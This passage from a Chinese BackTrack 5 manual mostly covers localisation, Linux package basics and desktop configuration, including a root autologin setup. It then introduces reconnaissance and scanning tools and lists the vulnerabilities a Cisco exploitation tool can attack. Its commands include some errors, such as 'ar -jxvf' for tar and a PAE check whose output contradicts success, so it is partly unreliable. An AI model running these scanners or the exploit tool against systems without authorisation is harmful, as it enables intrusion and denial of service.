Neuron security team【N.S.T】 第87/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第六章. BackTrack 汉化
第一节. BackTrack KDE 汉化
Backtrack 5的汉化可以完全在图形下面操作了,也不需要安装字体。大家看图操作吧。先要在命令行
运行:apt-get install language-selector-qt,安装语言选择器,然后打开“settings”——“system settings”
——“locale”——“Install new language”。
Neuron security team【N.S.T】 第88/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Apt-get install language-selector-qt
Neuron security team【N.S.T】 第89/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Install new language
Neuron security team【N.S.T】 第90/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第91/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第92/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
点击 install
Neuron security team【N.S.T】 第93/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. BackTrack GNOME 汉化
打开终端运行命令:apt-get install language-selector,安装完之后接着打开“System”-
“Administration”-“Language Support”,如果没有找到“Language Support”,运行命令 gksu
/usr/bin/gnome-language-selector 来安装 Language Support。
Install/Remove Language 中选择 Chinese(simplified),勾选上。点击"OK!",backtrack 自动安装
为中文之后,再到 Language & text窗口 的 text标签点击 apply system-wide,另外还需要安装
apt-get install gnome-user-guide-zh,重新启动 backtrack即可生效。
Neuron security team【N.S.T】 第94/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第95/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第96/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第97/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Language & text 窗口 的 text 标签点击 apply system-wide
Neuron security team【N.S.T】 第98/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三节. 系统语言环境设置
在安装了中文语言包和中文字体之后,还有最重要的一点就是设置系统中的环境变量,Linux 的系统
语言环境变量有很多选项,系统默认是采用 POSIX 作为 locale,也就是我们用 locale 命令看到的信息。这
些变量信息可以分别设置,如果全部值一样的话只要设置 LC_ALL 即可。
root@bt:~# nano /etc/environment
LC_ALL="zh_CN.UTF-8"
LANG="zh_CN.UTF-8"
root@bt:~# nano /root/.kde/share/config/kdeglobals,添加[locale]的行,修改为
[locale]
Country=cn
Language=zh_CN
默认语言环境变量 中文语言环境变量
root@bt:~# locale
LANG=C
LC_CTYPE="C" 语言符号及其分类
LC_NUMERIC="C" 数字
LC_TIME="C" 时间显示格式
LC_COLLATE="C" 比较和排序习惯
LC_MONETARY="C" 货币单位
LC_MESSAGES="C" 提示、错误、状态、标题、标签、
按钮、菜单
LC_PAPER="C" 默认纸张尺寸大小
LC_NAME="C" 姓名书写方式
LC_ADDRESS="C" 地址书写方式
LC_TELEPHONE="C" 电话号码书写方式
LC_MEASUREMENT="C" 度量衡表达方式
LC_IDENTIFICATION="C" 对 locale 自身包含信息的概述
LC_ALL=
root@bt:~# locale
LANG=C
LC_CTYPE="zh_CN.UTF-8"
LC_NUMERIC="zh_CN.UTF-8"
LC_TIME="zh_CN.UTF-8"
LC_COLLATE="zh_CN.UTF-8"
LC_MONETARY="zh_CN.UTF-8"
LC_MESSAGES="zh_CN.UTF-8"
LC_PAPER="zh_CN.UTF-8"
LC_NAME="zh_CN.UTF-8"
LC_ADDRESS="zh_CN.UTF-8"
LC_TELEPHONE="zh_CN.UTF-8"
LC_MEASUREMENT="zh_CN.UTF-
8"
LC_IDENTIFICATION="zh_CN.UTF-
8"
LC_ALL=zh_CN.UTF-8
Neuron security team【N.S.T】 第99/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第四节. 安装中文输入法
在 linux 里面的输入法有很多的选择,如 Fcitx、ibus(中文环境默认输入法),以及传说被淘汰的
scim(和衍生品 scim-python)、旧版本 sunpinyin(可以作为 ibus 模块,也支持 OS X)。其中 SCIM、IBus
是输入法框架,都是世界开发者共同维护的,起步都是中国开发者。还有 Firefox 浏览器的输入法扩展
fireinput。其实我们在 apt-get install language-support-zh 的时候就已经安装好了 SCIM 输入法了。下面再介
绍一下 fcitx 输入法的安装过程。
root@bt:~# wget http://www.fcitx.org/download/fcitx-3.6.3.tar.bz2 下载 fcitx
root@bt:~# apt-get install libxpm-dev libxft-dev libxtst-dev debhelper 安装库文件
root@bt:~# ar -jxvf fcitx-3.6.3.tar.bz2 解压 bz2包
root@bt:~# cd fcitx-3.6.3 进入解压的目录
root@bt:~/fcitx-3.6.3# fakeroot debian/rules binary 编译 fcitx 为 deb 包
root@bt:~/fcitx-3.6.3# cd .. 退出解压的目录
root@bt:~# dpkg -i fcitx_3.6~rc-1_i386.deb 安装编译好的 deb 包
root@bt:~#update-alternatives –install /etc/X11/xinit/xinput.d/all_ALL xinput-all_ALL
/etc/X11/xinit/xinput.d/fcitx 30 fcitx 加入到 alternatives 列表
root@bt:~# im-switch -s fcitx 设置成系统首选的输入法
Neuron security team【N.S.T】 第100/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第101/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第五节. ibus 自动启动
Neuron security team【N.S.T】 第102/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第103/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第六节. 云输入法
如 果 只 是 在 线 使 用 的 话 , 也 可 以 不 用 安 装 输 入 法 了 , 就 直 接 使 用 搜 狗 云 输 入 法
http://pinyin.sogou.com/cloud/ 或者 QQ 云输入法 http://py.qq.com/web/ ,云输入法使用方法更加简单。云输
入法是依托云计算技术的一个概念性输入法产品。与一般输入法最明显的区别在于它完全靠服务器运
算,具有更强大语言模型和词库,能大幅提升输入准确率,特别是长句输入准确率。
第七节. 更新 Firefox 版本
汉化了 BackTrack 之后 Firefox 浏览器还是显示为英文的,尝试了在 about:config 里面修改都不成功,所以还是重新安
装 Firefox 中 文 的 最 新 版 本 。 下 载 地 址 : http://g-fox.cn/download.html , 我 下 载 的 是 : http://dl1.g-
fox.cn/chinaedition/releases/zh-CN/FirefoxChinaEdition%202010.12.tar.bz2,注意这个文件有空格,下载之后先改一下名字,
去掉空格。
root@bt:~# tar xjvf FirefoxChinaEdition2010.12.tar.bz2 解压出来
root@bt:~# mv firefox-3.6.13 /usr/lib 把解压出来的文件夹移到到/usr/lib 下面去。
root@bt:~# cd /usr/bin 跳到/usr/bin 目录下面
root@bt:/usr/bin# rm firefox 删除原有的 firefox 链接
Neuron security team【N.S.T】 第104/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
root@bt:/usr/bin# ln –s /usr/lib/firefox-3.6.13/firefox 创建新的 firefox 的链接
另外还可以通过快捷键“ALT+F2”来打开运行窗口,然后输入:“kmenuedit”来打开 KDE 的菜单编辑器来修改火狐
浏览器的位置。
Neuron security team【N.S.T】 第105/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第七章. Linux 基础
第一节. 常用的 apt 命令
apt-get install <package> Downloads <package> and all of its dependencies, and installs or
upgrades them.
apt-get remove [--purge] <package> Removes <package> and any packages that depend on it. --
Neuron security team【N.S.T】 第106/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
purge specifies that packages should be purged.
apt-get update Updates packages listings from the repo, should be run at least once a week.
apt-get upgrade Upgrades all currently installed packages with those updates available from
the repo. should be run once a week.
apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install
or remove packages to satisfy dependencies.
apt-cache search <pattern> Searches packages and descriptions for <pattern>.
apt-cache show <package> Shows the full description of <package>.
apt-cache showpkg <package> Shows a lot more detail about <package>, and its relationships
to other packages.
man apt Will give you more info on these commands as well as many that are in less common
usage.
第二节. 常用的 dpkg 命令
dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for exam-
ple.
dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.
dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.
dpkg -r <package> Removes an installed package named <package>
dpkg -P <package> Purges an installed package named <package>. The difference between re-
move and purge is that while remove only deletes data and executables, purge also deletes
all configuration files in addition.
dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c
for checking the contents of a .deb file.
dpkg -s <package> Shows information on the installed package <package>. See also apt-cache
show for viewing package information in the Debian archive and dpkg -I for viewing package
information extracted from a .deb file.
dpkg-reconfigure <package> Reconfigures an installed package
man dpkg Will give you more info on these commands as well as many that are in less common
usage.
Neuron security team【N.S.T】 第107/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三节. 如何查找帮助
root@bt:~# man 命令名
root@bt:~# 一般单输入一个程序名就会显示出介绍了。
root@bt:~# 程序名 -help
或
root@bt:~# 程序名 --help
或
root@bt:~# 程序名 -h
第八章. BackTrack 基本使用
第一节. 更改 root 密码
默认的 root密码是 toor,为了安全,我们肯定要修改它,就是要 passwd 这个命令就可以了。
root@bt:~# passwd
Enter new UNIX password: {输入您的新密码}
Retype new UNIX password: {确认您的新密码}
passwd: password updated successfully
root@bt:~#
或者 passwd 跟上要更改密码的用户名,如:
root@bt:~# passwd root
Enter new UNIX password: {输入您的新密码}
Retype new UNIX password: {确认您的新密码}
passwd: password updated successfully
root@bt:~#
Neuron security team【N.S.T】 第108/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. 创建普通用户
Backtrack 官方也说了使用 backtrack 的应该都是安全专家,呵呵,所以都应该明白使用 root 的风险。
很明显如果是在公共场合使用 root 的话是很不安全的,所以建议大家不仅仅是更改了 root 密码,不想被
黑的话最好是另外参加一个普通用户。如下图是在 KDE 下面创建普通用户,创建好了之后重新使用普通
用户登录 backtrack,在必要的时候再使用 sudo 切换到 root,或者使用 su 命令来切换用户,这样就安全多
了。
Neuron security team【N.S.T】 第109/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第110/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三节. backtrack 自动登录到 KED 图形界面
本来 backtrack官方是故意配置默认从字符界面启动的,这一是为了安全,二是为了节省系统
资源。但群里的同学们都比较懒,所以给大家介绍一种方法,更改 backtrack自动从图形界面登
录。
为了能够自动登录系统的图形界面,所以先要安装 rungetty程序,用它来代替系统原有的
getty,我们可以使用 aptget 或 aptitude来安装 rungetty,如下:
aptitude install rungetty
或
apt-get install rungetty
aptitude 与 apt-get 一样,是 Debian 及其衍生系统中功能极其强大的包管理工具,Ubuntu和
backtrack系统中一样有这个工具。它与 apt-get 不同的是,aptitude 在处理依赖问题上更佳一些。举
例来说,aptitude 在删除一个包时,会同时删除本身所依赖的包。这样,系统中不会残留无用的包,整
个系统更为干净。以下是笔者总结的一些常用 aptitude 命令,仅供参考。
命令 作用
Neuron security team【N.S.T】 第111/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
aptitude update 更新可用的包列表
aptitude upgrade 升级可用的包
aptitude dist-upgrade 将系统升级到新的发行版
aptitude install pkgname 安装包
aptitude remove pkgname 删除包
aptitude purge pkgname 删除包及其配置文件
aptitude search string 搜索包
aptitude show pkgname 显示包的详细信息
aptitude clean 删除下载的包文件
aptitude autoclean 仅删除过期的包文件
更改配置文件 tty1.conf
使用 nano编辑配置文件 tty1.conf:
nano /etc/init/tty1.conf
注释掉原来的最后一行:
#exec /sbin/getty -8 38400 tty1
在最后添加一行:
exec /sbin/rungetty tty1 --autologin root
创建 bash_profile 文件
使用 nano创建一个.bash_profile 文件:
nano /root/.bash_profile
在.bash_profile文件中输入以下内容:
startx
Neuron security team【N.S.T】 第112/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
成功进行上面的操作之后,重新系统 backtrack 系统即可自动登录到 KDE 图形界面了。
第四节. 更改登录画面
打开主菜单中的“Settings”——“System Settings”,即打开了一个“Login Screen”窗口,接
着点击窗口里面的“Theme”标签。搜索安装你想要的登录画面吧,然后应用就行了。
Neuron security team【N.S.T】 第113/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
root@bt:~# update-rc.d kdm defaults
Neuron security team【N.S.T】 第114/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
重新启动即可,要是还不行再设置一下 kdm的权限即可。
root@bt:/etc/init.d/# sudo chmod +x kdm
第五节. 更改启动画面
打开 backtrack 系统的主菜单中的“Settings”——“System Settings”——“Workspace
Appearance”,然后点击“Splash Screen”里面的“Get New Themes”,安装一个新的主题,如我
Neuron security team【N.S.T】 第115/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
这里搜索安装的“Asphyxia” ,安装好你想要的主题之后点击“apply”应用它即可。
Neuron security team【N.S.T】 第116/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第六节. 更换桌面背景1
右击 backtrack 系统的桌面空白处,选择右键菜单中最后的选项“Folder View Settings
Alt+D, Alt+S”,在打开的对话框里面选择“wallpaper”,选择或安装你想要的桌面图片,点击
OK 即可。
Neuron security team【N.S.T】 第117/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第七节. 更换桌面背景2
当然你也可以在命令行下面更改它,如下更新您的桌面背景。
Neuron security team【N.S.T】 第118/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
root@bt:~# wget BackTrack-linux.org/bt4r2.png
root@bt:~# mv bt4r2.png /opt/kde3/share/wallpapers/bt4.png bt4路径
root@bt:~# wget http://dxyc.net/b.jpg
root@bt:~# mv b.jpg /usr/share/wallpapers/backtrack/Dev_backtrack_v7_v2.jpg bt5路径
第八节. Backtrack 5 KDE 更改屏幕分辨率
在“系统设置”的“硬件”中的“显示”里面更改分辨率。
Neuron security team【N.S.T】 第119/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第120/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第九节. Backtrack 5 GNOME 更改屏幕分辨率
打开在 system 菜单中的 monitors,选择合适的分辨率即可。
Neuron security team【N.S.T】 第121/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第122/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十节. 解决 GPG 错误
很多时候我们安装新的软件时,都可以会遇到类型以下的错误,这是由于我们的 BackTrack 里面没有
对应的公钥引起的,我们只要下载相应拨号的公钥并安装上就可以了,如下面的 EF4186FE247510BE。
W: GPG error: http://ppa.launchpad.net jaunty Release: The following signatures couldn't be verified because the
public key is not available: NO_PUBKEY EF4186FE247510BE
W: You may want to run apt-get update to correct these problems
root@bt:~# gpg --keyserver subkeys.pgp.net --recv EF4186FE247510BE
gpg: requesting key 247510BE from hkp server subkeys.pgp.net
gpg: key 247510BE: public key "Launchpad PPA for Ubuntu Mozilla Daily Build Team" im-
ported
gpg: no ultimately trusted keys found
gpg: Total number processed: 1
gpg: imported: 1 (RSA: 1)
root@bt:~# gpg --export --armor EF4186FE247510BE | sudo apt-key add -
OK
root@bt:~#
第十一节. backtrack 5 R2启用 PEA
Physical Address Extension ,缩写 PAE,物理地址扩展是指 x86和 x86-64处理器的一个特色,即
如果操作系统提供适当支持,则可以在 32位的系统中使用超过 4GiB 字节的实体内存。 PAE 为
IntelPentium Pro 及以上级别的 CPU(包括除了总线频率为400MHz 的这个版本的奔腾 M 之外的所有新型
号奔腾系列处理器)所支持,其他兼容的处理器,如速龙(Athlon)和 AMD 的较新型号的 CPU 也支持
PAE。
x86的处理器增加了额外的地址线以选择那些增加了的内存,所以实体内存的大小从32位增加到了36
位。最大的实体内存由4GiB增加到了64GiB。
32位的虚拟地址(线性地址)则没有变,所以一般的应用软件可以继续使用地址为32位的指令;如
果用平面内存模式的话,这些软件的地址空间也被限制为4GiB。操作系统用页表将这4GiB 的地址空间映
射到大小为64GiB 的实体内存,而这个映射对各个进程一般是不一样的。这样一来,即使不能为单单一个
程序所用,那些增加了的物理内存仍然可以发挥作用。
对于需要超过4GiB 内存的应用软件来说,除了一般的 PAE 支持,还需要操作系统提供另外的特殊的
技术。在 Windows 上,这种技术叫做 Address Windowing Extensions(AWE)。而在类 Unix 的系统上则有
多种技术在使用,例如使用 mmap()按需要把一部分文件映射到地址空间;但是,这还没有成为一个标
准。
Linux 系统之父 Linus Torvalds 此前曾经说过,在开启和关闭 CONFIG_HIGHMEM4G(可让32位系统支
持4GB 物理内存)的系统内核之间存在25%的性能差异。Linux 内核从2.6版本开始全面支持 PAE[3],这使
得在32位的机器上可以访问64GB 的内存。启用了 PAE 的 Linux 内核还需要同样支持 PAE 的 CPU。从2008
年起,很多一般的发布的 Linux版本都默认使用启用了 PAE的内核。
Ubuntu 32位内核默认开启了 CONFIG_HIGHMEM4G,但 PAE 模式是关闭的,这样32位内核在系统配置
Neuron security team【N.S.T】 第123/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
4GB 内存的时候会有1GB 保留给内核虚拟空 间,用户实际可用的只有3GB,而 Ubuntu PAE 内核使用的是
CONFIG_HIGHMEM64G,能处理最多64GB内存。
为了让我们的机器发挥出更优秀的性能,我们可以考虑开启 backtrack 的 PEA 功能。首先准备好我
们的内核和进入内核 menuconfig。
root@bt:~# prepare-kernel-sources
root@bt:/usr/src/linux# zcat /proc/config.gz > .config
root@bt:/usr/src/linux# make menuconfig
选上 Processor type and features -> High Memory Support(4) --> 64GB即可。
启用了 PEA之后要重建一下内核,然后重新启动系统,并检查看看是否已经成功启用了 PAE。
root@bt:/usr/src/linux# make scripts
root@bt:/usr/src/linux# make prepare
root@bt:/usr/src/linux# make
root@bt:/usr/src/linux# update-initramfs -u
root@bt:~# update-grub2
root@bt:~# cat /boot/config-3.2.4 | grep HIGHMEM</span
# CONFIG_HIGHMEM64G is not set
CONFIG_HIGHMEM=y
Neuron security team【N.S.T】 第124/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十二节. 解决启动不了图形界面的问题
我们都知道使用 startx 这个命令可以启动 KDE 图形界面,但是也可能有意外的情况启动不了图形界
面,如使用虚拟机的时候安装了 VMware tools 之后,或者 BackTrack 不支持您电脑的显卡等等情况,下
面介绍几种方法可以解决这个问题。
1、使用默认的 VESA 配置:
root@bt:~# fix-vesa
[*] Backing up xorg.conf to xorg.conf.orig
cp: cannot stat `/etc/X11/xorg.conf': No such file or directory
[*] Copying over xorg.conf-vesa to xorg.conf
[*] Please restart X
root@bt:~#
2、重新配置 X 服务包 ,使用以下命令重置 Xorg 的配置(如果您不明确执行命令后所提示的问题,
就用它默认的设置就可以了):
root@bt:~# dpkg-reconfigure xserver-xorg
3、如果是在 Vmware 虚拟机里面启动不了图形界面,那您可以执行下面的命令:
root@bt:~# fix-vesa-vmware
[*] Backing up xorg.conf to xorg.conf.orig
[*] Copying over xorg.conf-vmware to xorg.conf
[*] Please restart X
root@bt:~#
Neuron security team【N.S.T】 第125/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十三节. BackTrack 安装 QQ
因为 BackTrack 是基于 Ubuntu 的,所以安装 QQ 的话就要到 QQ 官方下载 DEB 包,可以直接使用浏
览器下载,或者使用 wget命令下载更方便一些,backtrack 4和 backtrack 5的安装方法一样。
QQ for linux 下载地址:http://im.qq.com/qq/linux/download.shtml
http://dl_dir.qq.com/linuxqq/linuxqq_v1.0.2-beta1_i386.deb
root@bt:~# wget http://dl_dir.qq.com/linuxqq/linuxqq_v1.0.2-beta1_i386.deb 下载
root@bt:~# dpkg -i linuxqq_v1.0.2-beta1_i386.deb 安装
安装完毕之后我们就可以在 internet 菜单里面看到熟悉的 QQ 图标了。
Neuron security team【N.S.T】 第126/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第127/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十四节. 更改桌面文件夹
现在 backtrack 的桌面就是 root 的文件夹,可以通过以下方法更改桌面所在的文件夹,同样可以更改下载、文档、音
乐、视频、相片等目录。
root@bt:~# mkdir Desktop 创建一个目录来存放桌面的文件。
root@bt:~# nano /root/.config/user-dirs.dirs 更改文件夹配置。
root@bt:~# logout 退出图形界面
root@bt:~# startx 重新登录图形界面就更换了桌面的目录。
# This file is written by xdg-user-dirs-update
# If you want to change or add directories, just edit the line you're
# interested in. All local changes will be retained on the next run
# Format is XDG_xxx_DIR="$HOME/yyy", where yyy is a shell-escaped
# homedir-relative path, or XDG_xxx_DIR="/yyy", where /yyy is an
# absolute path. No other format is supported.
#
XDG_DESKTOP_DIR="$HOME/" 把这项改刚才创建的目录:XDG_DESKTOP_DIR="$HOME/Desktop/"
XDG_DOWNLOAD_DIR="$HOME/"
XDG_TEMPLATES_DIR="$HOME/"
XDG_PUBLICSHARE_DIR="$HOME/"
XDG_DOCUMENTS_DIR="$HOME/"
XDG_MUSIC_DIR="$HOME/"
XDG_PICTURES_DIR="$HOME/"
XDG_VIDEOS_DIR="$HOME/"
第十五节. 准备内核头文件
在安装 compat- wireless、安装 Vmware tool 的时候、或安装其他驱动的时候您可能要编译代码所以需
要内核头文件,compat- wireless 是一个 Linux 的无线驱动兼容性解决方案,提供 Linux 内核2.6.25及以上
版本的最新无线驱动支持的改进。它可以在 Linux 802.11系统上进行编绎和安装而不必重新编绎整个内
核。
Neuron security team【N.S.T】 第128/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
而对于一些用户来说可能需要获得最新的 compat-wireless 驱动包以解决网卡的驱动问题,比如解决
某些网卡的注入问题。Backtrack 5可以使用以下命令快速的完成这些操作。
root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/
Neuron security team【N.S.T】 第129/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第130/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Backtrack 4可以使用以下命令快速的完成这些操作。
root@bt:~# apt-get install linux-source
root@bt:~# cd /usr/src/
root@bt:/usr/src# tar jxpf linux-source-2.6.35.8.tar.bz2
root@bt:/usr/src# rm linux
root@bt:/usr/src# ln -s linux-source-2.6.35.8 linux
root@bt:/usr/src# cd linux
root@bt:/usr/src/linux# cp /boot/config-2.6.35.8 .config
root@bt:/usr/src/linux# make scripts && make prepare
root@bt:/usr/src/linux# ln -s /usr/src/linux /lib/modules/2.6.35.8/build
root@bt:/usr/src/linux# apt-get clean
root@bt:/usr/src/linux# cd /root/
Neuron security team【N.S.T】 第131/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十六节. 更新 backtrack
系统设置——系统管理——add and remove software——software updates,选择需要的更新,一
般是全部更新。
Neuron security team【N.S.T】 第132/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第133/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
工具篇
Neuron security team【N.S.T】 第134/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第一章. Web 安全工具
Backtrack 中的工具非常多,我们觉得有些工具按工作的方向去分类会更好一些,所以就有了这个专
门介绍 Web安全工具的一章。
第一节. Wpscan
Neuron security team【N.S.T】 第135/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二章. Information Gathering 信息搜集工具
第一节. Network analysis- DNS analysis
1. DNSWalk
一款 dns 排错工具,使用非常简单,使用命令:./dnswalk xxx.com.。注意要在域名后面加上点号。不
过 akast 觉得这款工具效率不是很好。
Neuron security team【N.S.T】 第136/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
2. DNSTracer
这款工具可以判断 DNS 服务器从哪里取得权威性的 DNS 纪录,并将其显示出来。
3. DNSEnum
dnsenum的目的是尽可能收集一个域的信息,下载地址:http://code.google.com/p/dnsenum/。
1) 主机地址信息,(A record);
2) 域名服务器 (threaded);
3) MX record (threaded);
4) 在域名服务器上执行 axfr 请求;
5)通过 google 脚本得到扩展域名或子域名信息(google query = “allinurl: -www site:domain”);
6) 提取子域名并查询;
Neuron security team【N.S.T】 第137/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
7) 计算 C 类地址,并执行 whois 查询;
8) 执行反向查询;
9) 把地址段写入文件 domain_ips.txt。
命令举例:./dnsenum.pl cnn.com
常用参数命令举例:./dnsenum.pl --enum -f dns.txt --update a -r remote
Neuron security team【N.S.T】 第138/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第二节. Network analysis- Identify live hosts
1. 0trace
2. Fping
Fping 是一款与 ping 命令非常类似的小工具,但是却提供了额外的功能。你可以在 ping 范围之间从1
毫秒到5秒的频率调整时间并且让该软件在每次应答成功(不成功)的时候发出声音提示。还可以使用一个
简单的命令同时 ping 多台主机, Fping 可以使用 RAW 接口或者 ICMP 动态链接库文件。
我们可以先使用./netenum 192.168.81.1/24来生成一段 IP 列表,保存到一个文件中,然后就可以使用
fping 来进行批量 ping 了。
Neuron security team【N.S.T】 第139/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三节. Network analysis- Route analysis
1. Netenum
Irpas 工具包中的一款速度超快的活动主机扫描器。
Neuron security team【N.S.T】 第140/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
2. Protos
和 netenum一样是 Irpas 工具包中的扫描器,主要用于发现目标所支持和不支持的 IP 协议类型,速度
有点儿慢。
Neuron security team【N.S.T】 第141/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第四节. Network analysis- Network scanners
1. Autoscan
Autoscan 是一个网络发现和管理应用程序,它的主要目的是在网络环境中快速识别连接的主机或网
络设备。 在 BackTrack -> Information Gathering -> Network Analysis -> Network Scanners -> autoscan 这里打
Neuron security team【N.S.T】 第142/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
开它。
只要我们从菜单中启动它,我们将开始 Autoscan 的配置向导,单击“Forward”
配置要扫描的网络,点击 Add 添加你的网段 IP 地址。
Neuron security team【N.S.T】 第143/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
选择相应的网卡,也许你有多个网卡,选择连接你要扫描的目标网络的网卡。
最后一步确认我们的配置信息是否正确,如果配置正确无误,那就可以开始扫描了。
Neuron security team【N.S.T】 第144/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
扫描的结果类似下图,发现目标主机或设置所开放的端口和应用类型。
Neuron security team【N.S.T】 第145/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
2. NMAP
这款经典工具我想就不用罗嗦了,请看官方的《Nmap 参考指南》http://nmap.org/man/zh/ 。
3. Zenmap
图形化的 nmap,或者说是傻瓜化的 nmap。
Neuron security team【N.S.T】 第146/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
4. Unicornscan
Unicornscan 是一个非常棒的“payload 发送器“,它也可以作为一个异步扫描器。感谢 dash1b 和他
的补丁脚本,这脚本使得我们能够迅速的在 backtrack5 中使用 Unicornscan 的全部功能。使用以下命令
在 backtrack5 中安装 Unicornscan(如果尚未安装):
apt-get update
apt-get install unicornscan
接下来,运行 Postgres的安装脚本,在 http://code.google.com/p/unicornscan-bt5-install-
script/地址下载。这个脚本会设置 Framework3 PostgreSQL服务做为 Unicornscan的备份的数据库。
Neuron security team【N.S.T】 第147/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第148/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
启动 backtrack自带的 apache服务,使用浏览器访问 http://127.0.0.1/unicornscan。使用-
epgsqldb选项启动扫描。
第五节. Network analysis- SSL Analysis
1. Sslscan
用来分析网站使用的 SSL支持的加密算法。
Neuron security team【N.S.T】 第149/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第150/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
Neuron security team【N.S.T】 第151/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第三章. Vulnerability Assessment 漏洞检测工具
第1节. Network assessment
1. Cisco auditing tool
2. Cisco global exploiter
Usage :
perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
Neuron security team【N.S.T】 第152/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
3. Cisco OCS mass scanner
